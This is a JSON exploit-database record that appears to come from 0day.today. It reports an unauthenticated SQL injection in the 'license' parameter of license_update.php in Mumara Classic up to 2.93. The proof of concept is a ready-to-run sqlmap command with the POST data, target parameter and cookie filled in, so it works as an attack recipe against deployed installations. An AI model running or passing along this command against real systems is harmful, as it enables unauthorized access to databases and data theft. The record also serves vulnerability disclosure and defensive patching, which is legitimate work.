{"id": "1337DAY-ID-37036", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Mumara Classic 2.93 - (license) SQL Injection (Unauthenticated) Vulnerability", "description": "", "published": "2021-11-12T00:00:00", "modified": "2021-11-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/37036", "reporter": "Shain Lakin", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-12-04T15:48:18", "viewCount": 1281, "enchantments": {"dependencies": {}, "score": {"value": 7.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 7.1}, "sourceHref": "https://0day.today/exploit/37036", "sourceData": "# Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)\n# Exploit Author: (v0yager) Shain Lakin\n# Vendor Homepage: https://mumara.com\n# Version: <= 2.93\n# Tested on: CentOS 7\n\n-==== Vulnerability ====-\n\nAn SQL injection vulnerability in license_update.php in Mumara Classic\nthrough 2.93 allows a remote unauthenticated attacker to execute\narbitrary SQL commands via the license parameter.\n\n-==== POC ====-\n\nUsing SQLMap:\n\nsqlmap -u https://target/license_update.php --method POST --data \"license=MUMARA-Delux-01x84ndsa40&install=install\" -p license --cookie=\"PHPSESSID=any32gbaer3jaeif108fjci9x\" --dbms=mysql\n", "category": "web applications", "verified": true, "_state": {"dependencies": 1646100674, "score": 1684011499, "epss": 1679159933}, "_internal": {"score_hash": "5fc8a2a9717f9b715d56dddc583d0641"}}
{}